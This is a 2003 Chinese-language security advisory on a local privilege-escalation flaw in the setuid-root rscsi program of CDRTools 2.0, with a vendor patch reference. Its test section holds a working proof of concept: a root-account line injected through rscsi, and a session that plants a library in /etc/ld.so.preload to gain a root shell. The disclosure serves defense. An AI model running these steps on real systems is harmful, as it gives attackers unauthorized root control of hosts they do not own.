发布日期：2003-08-01
更新日期：2003-08-06

受影响系统：

CDRTools CDRTools 2.0.3
CDRTools CDRTools 2.0

不受影响系统：

CDRTools CDRTools 2.01a18

描述：

---

BUGTRAQ  ID: 8328

Cdrecord刻录程序支持大部分DVD-RW设备。

Cdrecord包含的rscsi程序可破坏攻击者指定文件的组属性，本地攻击者可以利用这个漏洞进行权限提升。

rscsi程序默认以setuid root权限安装，此程序可以修改和破坏文件的属组，因此攻击者可以调用这个程序对本地系统进行拒绝服务或获得root用户权限。

<*来源：Strategic Reconnaissance Team （research@secnetops.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Strategic Reconnaissance Team （research@secnetops.com）提供了如下测试方法：

$ echo C`echo -e
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` |
/opt/schily/sbin/rscsi /tmp/lala


[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

建议：

---

厂商补丁：

CDRTools
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

cdrtools Upgrade cdrtools 2.01a18 (Development)
http://freshmeat.net/releases/131136/

浏览次数：2815
严重程度：0（网友投票）